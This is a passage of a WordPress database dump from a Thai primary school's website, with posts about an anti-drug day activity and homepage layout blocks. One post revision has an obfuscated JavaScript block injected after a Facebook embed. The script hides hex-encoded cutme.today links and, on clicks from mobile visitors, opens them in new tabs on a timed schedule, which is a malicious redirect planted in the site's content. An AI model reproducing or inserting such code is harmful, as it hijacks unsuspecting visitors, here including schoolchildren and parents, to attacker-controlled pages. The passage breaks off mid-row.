ตระหนักเห็นถึงความสำคัญของการต่อต้านยาเสพติดที่เป็นบ่อนทำลายประเทศชาติและเยาวชน ณ โรงเรียนบ้านหนองปลาเข็ง','','publish','closed','closed','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%9a%e0%b9%89%e0%b8%b2%e0%b8%99%e0%b8%ab%e0%b8%99%e0%b8%ad%e0%b8%87%e0%b8%9b%e0%b8%a5%e0%b8%b2%e0%b9%80%e0%b8%82%e0%b9%87','','','2024-07-27 11:26:23','2024-07-27 04:26:23','',0,'http://pakhaeng.ssk.in.th/?p=95',0,'post','',0),
(96,1,'2024-07-27 11:21:29','2024-07-27 04:21:29','','449089082_974870507763954_1552515886644416971_n','','inherit','','closed','','449089082_974870507763954_1552515886644416971_n','','','2024-07-27 11:21:29','2024-07-27 04:21:29','',95,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/449089082_974870507763954_1552515886644416971_n.jpg',0,'attachment','image/jpeg',0),
(97,1,'2024-07-27 11:21:43','2024-07-27 04:21:43','<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%2Fposts%2Fpfbid02wxut69fe997oBuGVF7QLYW96y85xi6AQHqrQ9zdSZHVaeDKp9jTxRvQVEPqXe8Ehl&show_text=true&width=500\" width=\"500\" height=\"780\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ได้จัดกิจกรรมวันต่อต้านยาเสพติดโลก เพื่อรณรงค์ให้นักเรียนและชุมชน ตระหนักเห็นถึงความสำคัญของการต่อต้านยาเสพติดที่เป็นบ่อนทำลายประเทศชาติและเยาวชน ณ โรงเรียนบ้านหนองปลาเข็ง','','inherit','closed','closed','','95-revision-v1','','','2024-07-27 11:21:43','2024-07-27 04:21:43','',95,'http://pakhaeng.ssk.in.th/?p=97',0,'revision','',0);
INSERT INTO `wp_posts` VALUES
(98,1,'2024-07-27 11:26:04','2024-07-27 04:26:04','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingBgColor\":\"#0a71ad\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreBgColor\":\"#0a71ad\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 